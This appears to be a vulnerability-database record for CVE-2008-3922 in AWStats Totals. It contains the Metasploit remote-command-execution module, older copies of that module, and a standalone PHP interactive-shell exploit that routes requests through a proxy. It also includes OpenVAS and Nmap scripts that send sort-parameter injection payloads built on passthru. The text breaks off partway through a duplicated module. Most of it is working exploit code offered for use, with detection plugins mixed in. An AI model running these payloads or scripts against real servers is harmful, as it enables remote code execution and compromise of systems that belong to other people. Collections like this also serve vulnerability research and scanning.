ID MSF:EXPLOIT/UNIX/WEBAPP/AWSTATSTOTALS_MULTISORT
Type metasploit
Reporter Rapid7
Modified 2017-11-08T16:00:24
Description
This module exploits an arbitrary command execution vulnerability in the AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'AWStats Totals multisort Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.
},
'Author' => [ 'aushack' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2008-3922'],
['OSVDB', '47807'],
['BID', '30856']
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Aug 26 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "The full URI path to awstatstotals.php", "/awstatstotals/awstatstotals.php"]),
])
end
def check
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI']),
'vars_get' =>
{
'sort' => '"].phpinfo().exit().$a["'
}
}, 25)
if (res and res.body.match(/localhost/))
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
command = Rex::Text.uri_encode(payload.encoded)
sploit = normalize_uri(datastore['URI']) + '?sort="].passthru(\'echo%20YYY;' + command + ';echo%20YYY;\').exit().%24a["'
res = send_request_raw({
'uri' => sploit,
'method' => 'GET',
'headers' =>
{
'Connection' => 'Close',
}
}, 25)
if (res)
print_status("The server returned: #{res.code} #{res.message}")
m = res.body.match(/YYY\n(.*)\nYYY/m)
if (m)
print_status("Command output from the server:")
print("\n" + m[1] + "\n\n")
else
print_status("This server may not be vulnerable")
end
else
print_status("No response from the server")
end
end
end
{"id": "MSF:EXPLOIT/UNIX/WEBAPP/AWSTATSTOTALS_MULTISORT", "type": "metasploit", "bulletinFamily": "exploit", "title": "AWStats Totals multisort Remote Command Execution", "description": "This module exploits an arbitrary command execution vulnerability in the AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.\n", "published": "2011-05-25T10:42:37", "modified": "2017-11-08T16:00:24", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922"], "cvelist": ["CVE-2008-3922"], "lastseen": "2020-03-15T18:11:04", "viewCount": 69, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2020-03-15T18:11:04", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3922"]}, {"type": "exploitdb", "idList": ["EDB-ID:6368", "EDB-ID:17324"]}, {"type": "nessus", "idList": ["AWSTATSTOTALS_SORT_REMOTE_EXEC.NASL"]}, {"type": "nmap", "idList": ["NMAP:HTTP-AWSTATSTOTALS-EXEC.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:101698"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801893"]}, {"type": "dsquare", "idList": ["E-11"]}], "modified": "2020-03-15T18:11:04", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/awstatstotals_multisort.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AWStats Totals multisort Remote Command Execution',\n 'Description' => %q{\n This module exploits an arbitrary command execution vulnerability in the\n AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.\n },\n 'Author' => [ 'aushack' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2008-3922'],\n ['OSVDB', '47807'],\n ['BID', '30856']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 512,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd cmd_bash',\n 'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',\n }\n },\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Targets' => [[ 'Automatic', { }]],\n 'DisclosureDate' => 'Aug 26 2008',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('URI', [true, \"The full URI path to awstatstotals.php\", \"/awstatstotals/awstatstotals.php\"]),\n ])\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URI']),\n 'vars_get' =>\n {\n 'sort' => '\"].phpinfo().exit().$a[\"'\n }\n }, 25)\n\n if (res and res.body.match(/localhost/))\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n command = Rex::Text.uri_encode(payload.encoded)\n sploit = normalize_uri(datastore['URI']) + '?sort=\"].passthru(\\'echo%20YYY;' + command + ';echo%20YYY;\\').exit().%24a[\"'\n\n res = send_request_raw({\n 'uri' => sploit,\n 'method' => 'GET',\n 'headers' =>\n {\n 'Connection' => 'Close',\n }\n }, 25)\n\n if (res)\n print_status(\"The server returned: #{res.code} #{res.message}\")\n\n m = res.body.match(/YYY\\n(.*)\\nYYY/m)\n\n if (m)\n print_status(\"Command output from the server:\")\n print(\"\\n\" + m[1] + \"\\n\\n\")\n else\n print_status(\"This server may not be vulnerable\")\n end\n else\n print_status(\"No response from the server\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:35:16", "description": "awstatstotals.php in AWStats Totals 1.0 through 1.14 allows remote attackers to execute arbitrary code via PHP sequences in the sort parameter, which is used by the multisort function when dynamically creating an anonymous PHP function.", "edition": 4, "cvss3": {}, "published": "2008-09-04T18:41:00", "title": "CVE-2008-3922", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3922"], "modified": "2018-10-11T20:50:00", "cpe": ["cpe:/a:telartis_bv:awstats_totals:1.13", "cpe:/a:telartis_bv:awstats_totals:1.11", "cpe:/a:telartis_bv:awstats_totals:1.0", "cpe:/a:telartis_bv:awstats_totals:1.1", "cpe:/a:telartis_bv:awstats_totals:1.14"], "id": "CVE-2008-3922", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3922", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:telartis_bv:awstats_totals:1.14:*:*:*:*:*:*:*", "cpe:2.3:a:telartis_bv:awstats_totals:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:telartis_bv:awstats_totals:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:telartis_bv:awstats_totals:1.11:*:*:*:*:*:*:*", "cpe:2.3:a:telartis_bv:awstats_totals:1.13:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T07:38:26", "description": "AWStats Totals =< v1.14 multisort Remote Command Execution. CVE-2008-3922. Webapps exploit for php platform", "published": "2011-05-25T00:00:00", "type": "exploitdb", "title": "AWStats Totals <= 1.14 multisort - Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3922"], "modified": "2011-05-25T00:00:00", "id": "EDB-ID:17324", "href": "https://www.exploit-db.com/exploits/17324/", "sourceData": "##\r\n# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'AWStats Totals =< v1.14 multisort Remote Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\r\n\t\t\t\t\tAWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'patrick' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 12715 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2008-3922'],\r\n\t\t\t\t\t['OSVDB', '47807'],\r\n\t\t\t\t\t['BID', '30856'],\r\n\t\t\t\t\t['URL', 'http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl ruby bash telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'unix',\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' => [[ 'Automatic', { }]],\r\n\t\t\t'DisclosureDate' => 'Aug 26 2008',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('URI', [true, \"The full URI path to awstatstotals.php\", \"/awstatstotals/awstatstotals.php\"]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => datastore['URI'],\r\n\t\t\t'vars_get' =>\r\n\t\t\t{\r\n\t\t\t\t'sort' => '\"].phpinfo().exit().$a[\"'\r\n\t\t\t}\r\n\t\t}, 25)\r\n\r\n\t\tif (res and res.body.match(/localhost/))\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tcommand = Rex::Text.uri_encode(payload.encoded)\r\n\t\tsploit = datastore['URI'] + '?sort=\"].passthru(\\'echo%20YYY;' + command + ';echo%20YYY;\\').exit().%24a[\"'\r\n\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => sploit,\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'headers' =>\r\n\t\t\t{\r\n\t\t\t\t'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',\r\n\t\t\t\t'Connection' => 'Close',\r\n\t\t\t}\r\n\t\t}, 25)\r\n\r\n\t\tif (res)\r\n\t\t\tprint_status(\"The server returned: #{res.code} #{res.message}\")\r\n\r\n\t\t\tm = res.body.match(/YYY\\n(.*)\\nYYY/m)\r\n\r\n\t\t\tif (m)\r\n\t\t\t\tprint_status(\"Command output from the server:\")\r\n\t\t\t\tprint(\"\\n\" + m[1] + \"\\n\\n\")\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"This server may not be vulnerable\")\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tprint_status(\"No response from the server\")\r\n\t\tend\r\n\tend\r\n\r\nend\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17324/"}, {"lastseen": "2016-02-01T00:44:11", "description": "AWStats Totals (awstatstotals.php sort) Remote Code Execution Exploit. CVE-2008-3922. Webapps exploit for php platform", "published": "2008-09-05T00:00:00", "type": "exploitdb", "title": "AWStats Totals awstatstotals.php sort Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3922"], "modified": "2008-09-05T00:00:00", "id": "EDB-ID:6368", "href": "https://www.exploit-db.com/exploits/6368/", "sourceData": "<?php\n/* \n * Remote Execution Exploit for AWStats Totals vulnerability (Interactive Shell) Version 2\n * \n * Updated 05/09/08: The exploit now works with magic quotes on or off\n * \n * Author: Ricardo Almeida\n * email: ricardojba[at]aeiou[DoT]pt\n *\n * Greetz\n * The hacker webzine authored by Ronald van den Heetkamp for his code\n *\n * Credits: Vulnerabilities reported by Emory University.\n * http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt \n * \n */ \n\nfunction wrap($url){\n $ua = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver');\n $op = array('Windows','Windows XP','Linux','Windows NT','Windows 2000','OSX');\n $agent = $ua[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).' ('.$op[rand(0,5)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)';\n # tor or other proxy\n $tor = '172.20.1.15:8080';\n $timeout = '300';\n $ack = curl_init(); \n curl_setopt ($ack, CURLOPT_PROXY, $tor); \n curl_setopt ($ack, CURLOPT_URL, $url);\n curl_setopt ($ack, CURLOPT_HEADER, 1); \n curl_setopt ($ack, CURLOPT_USERAGENT, $agent); \n curl_setopt ($ack, CURLOPT_RETURNTRANSFER, 1); \n curl_setopt ($ack, CURLOPT_FOLLOWLOCATION, 1);\n curl_setopt ($ack, CURLOPT_TIMEOUT, $timeout);\n $syn = curl_exec($ack);\n $info = curl_getinfo($ack);\n curl_close($ack); \n\n if($info['http_code'] == '200') {\n return $syn;\n die();\n } else {\n return \"Fail! :\".$info['http_code'].\"\\r\\n\";\n }\n}\n\nif ($argc != 3) {die(\"Usage: awtotalhack.php <host> <magic_quotes on or off>\\nEx: awtotalhack.php host.tld on\\n\");}\narray_shift($argv);\n$host = $argv[0];\n$magic = $argv[1];\n\n# Start the interactive shell\nwhile(1){\n fwrite(STDOUT, \"[shell:~ # \");\n if ($magic == \"on\") {\n $c = str_split(trim(fgets(STDIN)));\n if (implode($c) == \"exit\") {die();};\n for($i=0;$i<count($c);$i++) {$c[$i] = \"chr(\".ord($c[$i]).\")\";}\n $cmd = implode(\"%2e\", $c);\n $attackurl = \"http://\".$host.\"/\".\"awstatstotals.php?sort=%7b%24%7bpassthru%28\".$cmd.\"%29%7d%7d%7b%24%7bexit%28%29%7d%7d\";\n echo wrap($attackurl);\n } else if ($magic == \"off\") {\n $cmd = preg_replace('/ /','%20',trim(fgets(STDIN)));\n if ($cmd == \"exit\") {die();};\n $attackurl = \"http://\".$host.\"/\".\"awstatstotals.php?sort=%22%5d%2epassthru%28%27\".$cmd.\"%27%29%2eexit%28%29%2e%24a%5b%22\";\n echo wrap($attackurl);\n }\n}\n?>\n\n# milw0rm.com [2008-09-05]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6368/"}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3922"], "description": "RCE via sort field\n\nVulnerability Type: Remote Command Execution", "modified": "2013-04-02T00:00:00", "published": "2012-01-26T00:00:00", "id": "E-11", "href": "", "type": "dsquare", "title": "Awstats Totals <= 1.14 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-05-08T19:11:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3922"], "description": "This host is running AWStats Totals and is prone to remote command\n execution vulnerabilities.", "modified": "2020-05-06T00:00:00", "published": "2011-06-07T00:00:00", "id": "OPENVAS:1361412562310801893", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801893", "type": "openvas", "title": "AWStats Totals 'sort' Parameter Remote Command Execution Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# AWStats Totals 'sort' Parameter Remote Command Execution Vulnerabilities\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801893\");\n script_version(\"2020-05-06T13:14:18+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 13:14:18 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-07 13:29:28 +0200 (Tue, 07 Jun 2011)\");\n script_cve_id(\"CVE-2008-3922\");\n script_bugtraq_id(30856);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"AWStats Totals 'sort' Parameter Remote Command Execution Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/44712\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/17324/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/495770/100/0/threaded\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/files/view/101698/awstatstotals_multisort.rb.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to execute arbitrary PHP\n commands by constructing specially crafted 'sort' parameters.\");\n\n script_tag(name:\"affected\", value:\"AWStats Totals versions 1.14 and prior.\");\n\n script_tag(name:\"insight\", value:\"The flaw is caused by improper validation of user-supplied input passed via\n the 'sort' parameter to 'multisort()' function, which allows attackers to execute arbitrary PHP code.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to AWStats Totals version 1.15 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running AWStats Totals and is prone to remote command\n execution vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port(default:80);\n\nif(!http_can_host_php(port:port)) {\n exit(0);\n}\n\nforeach dir (make_list_unique(\"/awstatstotals\", \"/awstats\", http_cgi_dirs(port:port)))\n{\n\n if(dir == \"/\") dir = \"\";\n\n res = http_get_cache(item: dir + \"/awstatstotals.php\", port:port);\n if(\"<title>AWStats Totals</title>\" >< res)\n {\n url = string(dir, '/awstatstotals.php?sort=\"].phpinfo().exit().%24a[\"');\n\n if(http_vuln_check(port:port, url:url, pattern:'>phpinfo()<',\n extra_check: make_list('>System <', '>Configuration<', '>PHP Core<')))\n {\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n }\n }\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nmap": [{"lastseen": "2019-05-30T17:05:34", "description": "Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922). \n\nThis vulnerability can be exploited through the GET variable `sort`. The script queries the web server with the command payload encoded using PHP's chr() function: \n\n`?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}`\n\nCommon paths for Awstats Total: \n\n * `/awstats/index.php`\n * `/awstatstotals/index.php`\n * `/awstats/awstatstotals.php`\n\nReferences: \n\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922\n * http://www.exploit-db.com/exploits/17324/\n\n## Script Arguments \n\n#### http-awstatstotals-exec.uri \n\nAwstats Totals URI including path. Default: /index.php\n\n#### http-awstatstotals-exec.cmd \n\nCommand to execute. Default: whoami\n\n#### http-awstatstotals-exec.outfile \n\nOutput file. If set it saves the output in this file. \n\nOther useful args when running this script: http.useragent - User Agent to use in GET request\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n## Example Usage \n \n \n nmap -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd=\"uname -a\", http-awstatstotals-exec.uri=/awstats/index.php' <target>\n nmap -sV --script http-awstatstotals-exec.nse <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-awstatstotals-exec.nse:\n |_Output for 'uname -a':Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux\n \n\n## Requires \n\n * http\n * io\n * nmap\n * shortport\n * stdnse\n * string\n * table\n\n* * *\n", "edition": 7, "published": "2011-08-23T06:29:12", "title": "http-awstatstotals-exec NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3922"], "modified": "2018-10-18T01:08:19", "id": "NMAP:HTTP-AWSTATSTOTALS-EXEC.NSE", "href": "https://nmap.org/nsedoc/scripts/http-awstatstotals-exec.html", "sourceData": "local http = require \"http\"\nlocal io = require \"io\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nExploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14\nand possibly other products based on it (CVE: 2008-3922).\n\nThis vulnerability can be exploited through the GET variable <code>sort</code>.\nThe script queries the web server with the command payload encoded using PHP's\nchr() function:\n\n<code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code>\n\nCommon paths for Awstats Total:\n* <code>/awstats/index.php</code>\n* <code>/awstatstotals/index.php</code>\n* <code>/awstats/awstatstotals.php</code>\n\nReferences:\n* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922\n* http://www.exploit-db.com/exploits/17324/\n]]\n\n---\n-- @usage\n-- nmap -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd=\"uname -a\", http-awstatstotals-exec.uri=/awstats/index.php' <target>\n-- nmap -sV --script http-awstatstotals-exec.nse <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-awstatstotals-exec.nse:\n-- |_Output for 'uname -a':Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux\n--\n-- @args http-awstatstotals-exec.uri Awstats Totals URI including path. Default: /index.php\n-- @args http-awstatstotals-exec.cmd Command to execute. Default: whoami\n-- @args http-awstatstotals-exec.outfile Output file. If set it saves the output in this file.\n---\n-- Other useful args when running this script:\n-- http.useragent - User Agent to use in GET request\n--\n\nauthor = \"Paulino Calderon <calderon@websec.mx>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"intrusive\", \"exploit\"}\n\n\nportrule = shortport.http\n\n--default values\nlocal DEFAULT_CMD = \"whoami\"\nlocal DEFAULT_URI = \"/index.php\"\n\n---\n--Writes string to file\n-- @param filename Filename to write\n-- @param content Content string\n-- @return boolean status\n-- @return string error\n--Taken from: hostmap.nse\nlocal function write_file(filename, contents)\n local f, err = io.open(filename, \"w\")\n if not f then\n return f, err\n end\n f:write(contents)\n f:close()\n return true\nend\n\n---\n--Checks if Awstats Totals installation seems to be there\n-- @param host Host table\n-- @param port Port table\n-- @param path Path pointing to AWStats Totals\n-- @return true if awstats totals is found\nlocal function check_installation(host, port, path)\n local check_req = http.get(host, port, path)\n if not(http.response_contains(check_req, \"AWStats\")) then\n return false\n end\n return true\nend\n\n---\n--MAIN\n---\naction = function(host, port)\n local output = {}\n local uri = stdnse.get_script_args(\"http-awstatstotals-exec.uri\") or DEFAULT_URI\n local cmd = stdnse.get_script_args(\"http-awstatstotals-exec.cmd\") or DEFAULT_CMD\n local out = stdnse.get_script_args(\"http-awstatstotals-exec.outfile\")\n\n --check for awstats signature\n local awstats_check = check_installation(host, port, uri)\n if not(awstats_check) then\n stdnse.debug1(\"This does not look like Awstats Totals. Quitting.\")\n return\n end\n\n --Encode payload using PHP's chr()\n local encoded_payload = {}\n cmd:gsub(\".\", function(c) encoded_payload[#encoded_payload+1] = (\"chr(%s)\"):format(string.byte(c)) end)\n local stealth_payload = \"?sort={%24{passthru%28\"..table.concat(encoded_payload,'.')..\"%29}}{%24{exit%28%29}}\"\n\n --set payload and send request\n local req = http.get(host, port, uri .. stealth_payload)\n if req.status and req.status == 200 then\n output[#output+1] = string.format(\"\\nOutput for '%s':%s\", cmd, req.body)\n\n --if out set, save output to file\n if out then\n local status, err = write_file(out, req.body)\n if status then\n output[#output+1] = string.format(\"Output saved to %s\\n\", out)\n else\n output[#output+1] = string.format(\"Error saving output to %s: %s\\n\", out, err)\n end\n end\n\n else\n if nmap.verbosity()>= 2 then\n output[#output+1] = \"[Error] Request did not return 200. Make sure your URI value is correct. A WAF might be blocking your request\"\n end\n end\n\n --output\n if #output>0 then\n return table.concat(output, \"\\n\")\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:01", "description": "", "published": "2011-05-26T00:00:00", "type": "packetstorm", "title": "AWStats Totals 1.14 Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3922"], "modified": "2011-05-26T00:00:00", "id": "PACKETSTORM:101698", "href": "https://packetstormsecurity.com/files/101698/AWStats-Totals-1.14-Remote-Command-Execution.html", "sourceData": "`## \n# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'AWStats Totals =< v1.14 multisort Remote Command Execution', \n'Description' => %q{ \nThis module exploits an arbitrary command execution vulnerability in the \nAWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable. \n}, \n'Author' => [ 'patrick' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 12715 $', \n'References' => \n[ \n['CVE', '2008-3922'], \n['OSVDB', '47807'], \n['BID', '30856'], \n['URL', 'http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt'], \n], \n'Privileged' => false, \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 512, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl ruby bash telnet', \n} \n}, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Targets' => [[ 'Automatic', { }]], \n'DisclosureDate' => 'Aug 26 2008', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('URI', [true, \"The full URI path to awstatstotals.php\", \"/awstatstotals/awstatstotals.php\"]), \n], self.class) \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => datastore['URI'], \n'vars_get' => \n{ \n'sort' => '\"].phpinfo().exit().$a[\"' \n} \n}, 25) \n \nif (res and res.body.match(/localhost/)) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \ncommand = Rex::Text.uri_encode(payload.encoded) \nsploit = datastore['URI'] + '?sort=\"].passthru(\\'echo%20YYY;' + command + ';echo%20YYY;\\').exit().%24a[\"' 